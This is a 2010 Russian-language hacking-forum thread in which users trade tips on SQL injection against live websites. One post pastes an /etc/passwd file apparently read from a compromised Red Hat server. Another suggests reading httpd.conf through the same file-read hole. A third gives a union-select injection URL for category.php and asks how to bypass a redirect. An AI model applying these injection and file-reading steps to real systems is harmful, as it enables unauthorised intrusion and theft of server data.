HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.08.2010, 05:41
Koren
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069

Репутация: 0
По умолчанию

Konqi просто помню одному человеку показал линк на иньекцию, сказав возможно это blind он сказал что на asp не раскрутить т. к там не всё так просто, вот и задал такой вопрос
 
Ответить с цитированием

  #2  
Старый 16.08.2010, 05:46
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от Koren  
Konqi просто помню одному человеку показал линк на иньекцию, сказав возможно это blind он сказал что на asp не раскрутить т. к там не всё так просто, вот и задал такой вопрос
а что, asp требует особых sql запросов?

пусть здесь выскажет свое мнение,мне тоже интересно
 
Ответить с цитированием

  #3  
Старый 16.08.2010, 17:09
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Какой может быть путь у сайта с @@version_compile_os= redhat-linux-gnu ?
 
Ответить с цитированием

  #4  
Старый 16.08.2010, 17:18
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от -PRIVAT-  
Какой может быть путь у сайта с @@version_compile_os= redhat-linux-gnu ?
дерева *NIX, больше никто ничего не может сказать
 
Ответить с цитированием

  #5  
Старый 16.08.2010, 17:24
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Нашёл в etc/passw следующие:

Цитата:
Сообщение от None  
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0
perator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74
rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
db:x:500:500::/home/db:/bin/bash
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
wburke:x:501:502::/home/wburke:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
 
Ответить с цитированием

  #6  
Старый 16.08.2010, 17:28
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

-PRIVAT-

для начала скажу что такого файла нету, а еще этот файл ниче не даст
 
Ответить с цитированием

  #7  
Старый 16.08.2010, 18:10
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

Цитата:
Сообщение от -PRIVAT-  
Какой может быть путь у сайта с @@version_compile_os= redhat-linux-gnu ?
если читалка работает то попробуй найти /etc/httpd/conf/httpd.conf
 
Ответить с цитированием

  #8  
Старый 16.08.2010, 19:53
Koren
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069

Репутация: 0
По умолчанию

category.php?categoryID=55+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16+--+ указывает на фильтрацию, обхожу фильтр выдаёт цифры для вывода инфы но страница держится не больше 1 секунды, и перекидывает на главгую, возможно что то сделать?

впринцепи решение уже нашёл.. "остановив страницу"))

ну может есть ещё какой способ

т.к не всегда получается успеть нажать на stop
 
Ответить с цитированием

  #9  
Старый 16.08.2010, 19:58
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию

Используй спец софт, а не в браузере.
 
Ответить с цитированием

  #10  
Старый 16.08.2010, 20:10
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Koren  
category.php?categoryID=55+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16+--+ указывает на фильтрацию, обхожу фильтр выдаёт цифры для вывода инфы но страница держится не больше 1 секунды, и перекидывает на главгую, возможно что то сделать?
впринцепи решение уже нашёл.. "остановив страницу"))
ну может есть ещё какой способ
т.к не всегда получается успеть нажать на stop
юзай более продвинутые бразуеры, такие как opera.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.